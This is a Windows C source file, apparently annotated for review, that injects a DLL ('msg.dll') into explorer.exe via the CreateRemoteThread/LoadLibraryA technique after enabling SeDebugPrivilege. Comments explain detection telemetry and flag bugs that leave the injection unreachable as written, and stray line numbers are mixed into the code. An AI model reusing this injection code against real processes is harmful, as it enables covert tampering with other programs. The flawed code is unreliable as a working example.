1. #include <Windows.h>
2. #include <tchar.h>
3. #include <TlHelp32.h>
4.
/* Map the DLL named by lpszLibName into process dwProcessId; TRUE only if every step up to and including the remote thread's completion succeeded. */
BOOL LoadRemoteDll(DWORD dwProcessId,LPTSTR lpszLibName);
/* Enable one named privilege on the current process token; returns a Win32 error code (0 on success). */
DWORD EnablePrivilege (PCSTR name);
/* Resolve a running process to its PID via a Toolhelp snapshot; writes *lpPID and returns TRUE on a match. */
BOOL GetProcessIdByName(LPSTR szProcessName, LPDWORD lpPID);
8.
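/*
 * Enable a single named privilege (e.g. SE_DEBUG_NAME) on the current
 * process token.
 *
 * name: privilege name accepted by LookupPrivilegeValue.
 *
 * Returns ERROR_SUCCESS (0) when the privilege was enabled, otherwise the
 * Win32 error code of the step that failed. AdjustTokenPrivileges can
 * return TRUE while enabling nothing; it then sets the last error to
 * ERROR_NOT_ALL_ASSIGNED, which is reported here as a non-zero value, so
 * callers must treat any non-zero result as "privilege not held".
 */
DWORD EnablePrivilege (PCSTR name)
{
    HANDLE hToken = NULL;
    DWORD rv = ERROR_SUCCESS;
    /* One entry; PrivilegeCount = 1, the LUID is filled in below. */
    TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };

    if (!LookupPrivilegeValue(NULL, name, &priv.Privileges[0].Luid)) {
        return GetLastError();
    }
    /* Fail here rather than passing an uninitialized handle onward. */
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        return GetLastError();
    }
    /* The return value alone is not sufficient (see header comment), so the
     * last-error value is read in every case. */
    AdjustTokenPrivileges(hToken, FALSE, &priv, sizeof priv, NULL, NULL);
    rv = GetLastError();
    CloseHandle(hToken);
    return rv;
}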
36.
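/*
 * Find the PID of the first running process whose image name matches
 * szProcessName (case-insensitive comparison against
 * PROCESSENTRY32.szExeFile, so the name is the bare file name such as
 * "explorer.exe", not a path).
 *
 * szProcessName: image file name to look for.
 * lpPID: receives the process id on success; left untouched otherwise.
 *
 * Returns TRUE when a match was found, FALSE if an argument is NULL, the
 * snapshot could not be taken or enumerated, or no process matched. The
 * snapshot handle is released on every path.
 */
BOOL GetProcessIdByName(LPSTR szProcessName, LPDWORD lpPID)
{
    PROCESSENTRY32 ps;
    HANDLE hSnapshot;
    BOOL bFound = FALSE;

    if (szProcessName == NULL || lpPID == NULL) {
        return FALSE;
    }

    ZeroMemory(&ps, sizeof ps);
    ps.dwSize = sizeof ps;   /* Toolhelp rejects the call when dwSize is unset. */

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    /* A failed Process32First simply falls through to the single close
     * below instead of returning with the handle still open. */
    if (Process32First(hSnapshot, &ps)) {
        do {
            if (lstrcmpi(ps.szExeFile, szProcessName) == 0) {
                *lpPID = ps.th32ProcessID;
                bFound = TRUE;
                break;
            }
        } while (Process32Next(hSnapshot, &ps));
    }

    CloseHandle(hSnapshot);
    return bFound;
}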
75.
/*
 * Map the DLL at lpszLibName into the process dwProcessId.
 *
 * The function writes the DLL path into memory it allocates inside the
 * target, then starts a thread in the target at kernel32!LoadLibraryA with
 * that string as the thread argument. This is the textbook
 * CreateRemoteThread/LoadLibrary injection pattern; the cross-process
 * VirtualAllocEx + WriteProcessMemory + CreateRemoteThread sequence is
 * exactly what endpoint telemetry keys on (Sysmon Event ID 8, for
 * instance, records CreateRemoteThread into another process), so this
 * is the block to look at when assessing or detecting the tool.
 *
 * dwProcessId: target process; opened with PROCESS_ALL_ACCESS, so the
 *   caller needs rights to it (the entry point enables SeDebugPrivilege).
 * lpszLibName: path handed to LoadLibraryA in the target. It is copied
 *   byte-for-byte (cch = lstrlen + 1 bytes), which is only correct for an
 *   ANSI (char) build; the routine resolved is the "A" variant.
 *
 * Returns TRUE once the remote thread has been created and has finished.
 * Neither the WaitForSingleObject result nor the thread's exit code (the
 * HMODULE LoadLibraryA returns) is inspected, so TRUE does not prove the
 * DLL actually loaded.
 */
BOOL LoadRemoteDll(DWORD dwProcessId,LPTSTR lpszLibName){
    BOOL bResult = FALSE;
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    PSTR pszLibFileRemote = NULL;   /* address inside the target, never dereferenced here */
    DWORD cch;
    PTHREAD_START_ROUTINE pfnThreadRtn;

    /* __leave on any failure drops into __finally, which releases whatever
     * was acquired so far based on the NULL-initialized locals above. */
    __try{
        hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);
        if(hProcess == NULL){
            __leave;
        }
        cch = 1 + lstrlen(lpszLibName);   /* characters incl. terminator; used as a byte count below */
        pszLibFileRemote = (PSTR)VirtualAllocEx(hProcess,NULL,cch,MEM_COMMIT,PAGE_READWRITE);
        if(pszLibFileRemote == NULL){
            __leave;
        }
        if(!WriteProcessMemory(hProcess,(LPVOID)pszLibFileRemote,(LPVOID)lpszLibName,cch,NULL)){
            __leave;
        }
        /* kernel32 is mapped at the same base in every process of a session,
         * so the local address is valid in the target. GetProcAddress takes
         * an LPCSTR; the TEXT() wrapper only works in a non-UNICODE build. */
        pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),TEXT("LoadLibraryA"));
        if(pfnThreadRtn == NULL){
            __leave;
        }
        hThread = CreateRemoteThread(hProcess,NULL,0,pfnThreadRtn,(PVOID)pszLibFileRemote,0,NULL);
        if(hThread == NULL){
            __leave;
        }
        WaitForSingleObject(hThread,INFINITE);   /* return value unchecked */
        bResult = TRUE;
    }__finally{
        /* Order matters: the remote buffer must be freed while hProcess is
         * still open, so the process handle is closed last. */
        if(pszLibFileRemote != NULL){
            VirtualFreeEx(hProcess,(PVOID)pszLibFileRemote,0,MEM_RELEASE);
        }
        if(hThread != NULL){
            CloseHandle(hThread);
        }
        if(hProcess != NULL){
            CloseHandle(hProcess);
        }
    }
    return bResult;
}
120.
/*
 * Entry point: enable SeDebugPrivilege, locate explorer.exe and hand its
 * PID to LoadRemoteDll with "msg.dll". Each step is written as a guard
 * clause that returns 0 on failure; the window-related parameters are
 * unused.
 *
 * NOTE(review): the stray ';' after the first if(...) turns that guard
 * into an empty statement, so the `return 0;` that follows it is
 * unconditional and the two remaining steps are unreachable as written.
 * Also, the function falls off its end without a return value on the
 * success path even though the value is used as the process exit code.
 */
int WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPTSTR lpCmdLine,int nCmdShow){
    DWORD dwPID;
    if(0!=EnablePrivilege(SE_DEBUG_NAME));   /* empty body — see NOTE above */
        return 0;
    if(!GetProcessIdByName("explorer.exe",&dwPID))
        return 0;
    if(!LoadRemoteDll(dwPID,"msg.dll"))
        return 0;
}